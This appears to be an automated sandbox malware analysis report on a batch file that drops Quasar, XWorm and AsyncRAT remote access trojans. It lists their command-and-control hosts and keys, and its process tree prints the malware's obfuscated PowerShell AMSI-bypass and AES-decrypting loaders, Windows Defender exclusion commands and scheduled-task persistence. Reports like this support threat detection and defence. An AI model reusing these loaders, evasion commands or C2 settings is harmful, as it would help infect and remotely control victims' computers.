Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
-
submitted
02-07-2024 13:39
General
-
Target
Fanta_Is_Better_Than_Coke.bat
-
Size
811KB
-
MD5
add48f177d5e0a81fca63ca2c6e5c9e2
-
SHA1
5d43d5b761c889443d7b48dd962b9d20514edc5f
-
SHA256
99cee0b28ecb0e558fca04fb56c8b61abf7af751fbef519328c2da4f19fe9d93
-
SHA512
81ecd172e609eb80cf358b45cdd32cc7d1f6b8d8f62d3933f7a5be0b1a786e2eefeab8402f4f4e710b11d9d8dc8ddde44d59827bb4e63fb58b8acca4c14c8d33
-
SSDEEP
12288:zaaq6kVlGXfjTXAi9iLyLZRfRLK9Bx2WlKg86GcUJxH:zaaqjlgfnAZLUfKx24w
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Extracted
xworm
super-nearest.gl.at.ply.gg:17835
best-bird.gl.at.ply.gg:27196
wiz.bounceme.net:6000
-
Install_directory
%ProgramData%
Extracted
asyncrat
Default
finally-grande.gl.at.ply.gg:25844
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
quasar
3.1.5
Slave
stop-largely.gl.at.ply.gg:27116
$Sxr-kl1r656AGsPQksTmi8
-
encryption_key
WyBm1iVkHZmEnGPMAZWV
-
install_name
$phantom.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
$phantomSTARTUP~MSF
-
subdirectory
$phantom
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Detect Xworm Payload 7 IoCs
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 3 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Async RAT payload 2 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 7 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 17 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 62 IoCs
-
Modifies registry class 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of UnmapMainImage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a8bf4daa-7a1c-440a-ab39-c93a58830d40}2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qOvePjccuiEi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PpIMTpjccanzAR,[Parameter(Position=1)][Type]$IlJvAblwjS)$meqrIzVrANd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+'De'+'l'+'e'+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+''+'m'+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+'odu'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+'e'+'g'+''+'a'+'t'+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+'a'+'s'+'s'+[Char](44)+''+[Char](80)+'u'+'b'+'li'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$meqrIzVrANd.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+'N'+''+[Char](97)+'me'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'ByS'+[Char](105)+''+'g'+''+[Char](44)+''+'P'+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$PpIMTpjccanzAR).SetImplementationFlags(''+'R'+''+[Char](117)+'nt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');$meqrIzVrANd.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+'k'+[Char](101)+'','P'+[Char](117)+'b'+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+'o'+'t'+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'ua'+[Char](108)+'',$IlJvAblwjS,$PpIMTpjccanzAR).SetImplementationFlags('Run'+[Char](116)+'im'+'e'+''+[Char](44)+'Man'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $meqrIzVrANd.CreateType();}$SdAxqJnGOfsWb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+'o'+''+[Char](115)+'of'+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+'eN'+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$WJcHwrgIwMHfIW=$SdAxqJnGOfsWb.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+'c,'+'S'+'t'+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QlTxkoQQHXDqqkMTrYt=qOvePjccuiEi @([String])([IntPtr]);$UoSTxkneJzXdesVbzWNKqY=qOvePjccuiEi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$yOlyYSFmgdV=$SdAxqJnGOfsWb.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+'ul'+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+''+'3'+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$rVebmkWyrHlcFr=$WJcHwrgIwMHfIW.Invoke($Null,@([Object]$yOlyYSFmgdV,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+'ary'+[Char](65)+'')));$QudEXuerKTnDNWfIw=$WJcHwrgIwMHfIW.Invoke($Null,@([Object]$yOlyYSFmgdV,[Object](''+[Char](86)+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$GrsnzsF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rVebmkWyrHlcFr,$QlTxkoQQHXDqqkMTrYt).Invoke(''+[Char](97)+'ms'+'i'+''+'.'+''+'d'+''+[Char](108)+'l');$RbxvEhtImLsJaoKxb=$WJcHwrgIwMHfIW.Invoke($Null,@([Object]$GrsnzsF,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+'S'+'c'+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$UiXnTIAEZO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QudEXuerKTnDNWfIw,$UoSTxkneJzXdesVbzWNKqY).Invoke($RbxvEhtImLsJaoKxb,[uint32]8,4,[ref]$UiXnTIAEZO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RbxvEhtImLsJaoKxb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QudEXuerKTnDNWfIw,$UoSTxkneJzXdesVbzWNKqY).Invoke($RbxvEhtImLsJaoKxb,[uint32]8,0x20,[ref]$UiXnTIAEZO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'7'+'7'+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\7zip.exeC:\ProgramData\7zip.exe2⤵
- Executes dropped EXE
-
C:\ProgramData\7zip.exeC:\ProgramData\7zip.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fanta_Is_Better_Than_Coke.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rXR21TuBxaovC83qSMg04/FSGHmsp9PToRRPGU6+NCs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mzxnaH7Z8Ji0bIkEn9uCtw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $kfjQH=New-Object System.IO.MemoryStream(,$param_var); $eDzYx=New-Object System.IO.MemoryStream; $qNgsY=New-Object System.IO.Compression.GZipStream($kfjQH, [IO.Compression.CompressionMode]::Decompress); $qNgsY.CopyTo($eDzYx); $qNgsY.Dispose(); $kfjQH.Dispose(); $eDzYx.Dispose(); $eDzYx.ToArray();}function execute_function($param_var,$param2_var){ $vCMob=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SiQQu=$vCMob.EntryPoint; $SiQQu.Invoke($null, $param2_var);}$LjjFB = 'C:\Users\Admin\AppData\Local\Temp\Fanta_Is_Better_Than_Coke.bat';$host.UI.RawUI.WindowTitle = $LjjFB;$YZHVM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LjjFB).Split([Environment]::NewLine);foreach ($UeSyt in $YZHVM) { if ($UeSyt.StartsWith('SRNvOHXhZzwVKgCZaJJj')) { $aZcZK=$UeSyt.Substring(20); break; }}$payloads_var=[string[]]$aZcZK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_778_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_778.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_778.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_778.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rXR21TuBxaovC83qSMg04/FSGHmsp9PToRRPGU6+NCs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mzxnaH7Z8Ji0bIkEn9uCtw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $kfjQH=New-Object System.IO.MemoryStream(,$param_var); $eDzYx=New-Object System.IO.MemoryStream; $qNgsY=New-Object System.IO.Compression.GZipStream($kfjQH, [IO.Compression.CompressionMode]::Decompress); $qNgsY.CopyTo($eDzYx); $qNgsY.Dispose(); $kfjQH.Dispose(); $eDzYx.Dispose(); $eDzYx.ToArray();}function execute_function($param_var,$param2_var){ $vCMob=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SiQQu=$vCMob.EntryPoint; $SiQQu.Invoke($null, $param2_var);}$LjjFB = 'C:\Users\Admin\AppData\Roaming\Windows_Log_778.bat';$host.UI.RawUI.WindowTitle = $LjjFB;$YZHVM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LjjFB).Split([Environment]::NewLine);foreach ($UeSyt in $YZHVM) { if ($UeSyt.StartsWith('SRNvOHXhZzwVKgCZaJJj')) { $aZcZK=$UeSyt.Substring(20); break; }}$payloads_var=[string[]]$aZcZK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe"C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7zip.exe"C:\Users\Admin\AppData\Local\Temp\7zip.exe"7⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zip.exe'8⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7zip.exe'8⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\7zip.exe'8⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "7zip" /tr "C:\ProgramData\7zip.exe"8⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\conhost.exe"C:\Users\Admin\AppData\Local\Temp\conhost.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\wininit.exe"C:\Users\Admin\AppData\Local\Temp\wininit.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$phantomSTARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\wininit.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WINDOWSBIOS .COM'7⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WINDOWSBIOS .COM'7⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WINDOWSBIOS " /tr "C:\ProgramData\WINDOWSBIOS .COM"7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 25dd19b122f0b1a7f17c85849a8ecd10 ij0D08FTzUubVx9b9VYGIA.0.1.0.0.01⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
